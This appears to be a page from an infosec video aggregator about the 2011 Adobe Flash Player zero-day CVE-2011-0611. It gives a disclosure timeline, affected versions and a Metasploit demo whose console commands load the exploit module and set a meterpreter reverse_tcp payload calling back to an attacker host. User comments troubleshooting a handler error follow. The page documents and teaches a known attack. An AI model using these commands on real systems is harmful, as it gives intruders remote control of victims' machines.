Description: Timeline :
Vulnerability discovered exploited in the wild
First information about the 0day published the 2011-04-11
Security Advisory APSA11-02 posted by the vendor the 2011-04-11
First vulnerability analysis provided the 2011-04-11
Vendor update provided the 2011-04-15
Metasploit PoC provided by sinn3r the 2011-04-15
PoC provided by:
Unknown
sinn3r
Reference(s) :
CVE-2011-0611
APSA11-02
OSVDB-71686
Affected versions :
Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.25 and earlier for Chrome users
Adobe Flash Player 10.2.156.12 and earlier versions for Android
Adobe AIR 2.6.19120 and earlier versions for Windows, Macintosh and Linux
Tested on Windows XP SP3 with :
Internet Explorer 7.0.5730.13
Adobe Flash Player 10.2.153.1
Description :
This module exploits a vulnerability in Adobe Flash Player that was discovered, and has been exploited actively in the wild. By embedding a specially crafted .swf file, Adobe Flash crashes due to an invalid use of an object type, which allows attackers to overwrite a pointer in memory, and results arbitrary code execution.
Metasploit demo :
use exploit/windows/browser/adobe_flashplayer_flash10o
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid
Tags: metasploit , adobe , flash ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
How do I fix this? :
[*] Exploit running as background job.
[-] Handler failed to bind to 192.168.159.129:4444
[*] Started revers handler on 0.0.0.0:4444
[-] Exploit excpetion: The address is already in use (192.169.159.129:8080).
Please, help me!
Thanks.
i think ya setup local server in ya pc... off tat server and do again
thanks zatan for video :)!